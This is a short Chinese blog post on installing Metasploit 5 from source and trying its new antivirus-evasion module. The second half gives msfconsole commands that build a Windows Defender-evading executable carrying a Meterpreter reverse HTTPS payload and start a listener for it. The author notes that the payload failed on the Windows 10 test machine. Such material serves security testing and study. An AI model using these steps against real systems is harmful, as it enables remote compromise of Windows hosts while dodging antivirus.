Metasploit5 新特性 免杀模块

---
title: Metasploit5 新特性 免杀模块
date: 2018-12-14 16:44:51
categories:
- Post-Exploitation
---


一,安装metasploit5

metasploit5是metasploit的开发版,有一些正式版没有的功能模块,msf5暂时不支持使用apt直接安装,必须要手动安装。

Ubuntu 18.04安装metasploit5

1,首先安装相关依赖

```
sudo apt-get -y install \
autoconf \
bison \
build-essential \
curl \
git-core \
libapr1 \
libaprutil1 \
libcurl4-openssl-dev \
libgmp3-dev \
libpcap-dev \
libpq-dev \
libreadline6-dev \
libsqlite3-dev \
libssl-dev \
libsvn1 \
libtool \
libxml2 \
libxml2-dev \
libxslt-dev \
libyaml-dev \
locate \
ncurses-dev \
openssl \
postgresql \
postgresql-contrib \
wget \
xsel \
zlib1g \
zlib1g-dev
```

2, 从git下载安装

```
git clone https://github.com/rapid7/metasploit-framework.git

cd metasploit-framework

bundle install

./msfconsole
```

当然,这里省略了相关数据库的配置,想要配置数据库,参考

[【译】Metasploit:搭建开发环境](https://xz.aliyun.com/t/2390)

[Setting Up a Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment)

二、体验免杀新特性

```
msf5 > use evasion/windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 evasion(windows/windows_defender_exe) > set lhost 10.140.0.3
lhost => 10.140.0.3
msf5 evasion(windows/windows_defender_exe) > run

[*] Compiled executable size: 4096
[+] kczeLuUrsL.exe stored at /root/.msf4/local/kczeLuUrsL.exe
msf5 evasion(windows/windows_defender_exe) > handler -p windows/meterpreter/reverse_https -H 0.0.0.0 -P 8443
[*] Payload handler running as background job 0.
msf5 evasion(windows/windows_defender_exe) >
[*] Started HTTPS reverse handler on https://0.0.0.0:8443
```

我在本地测试,生成的payload win10 x64无法运行

<iframe width="560" height="315" src="https://www.youtube.com/embed/pXfzrx2WeJ0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>

猜你喜欢

转载自www.cnblogs.com/lzhd24/p/10406250.html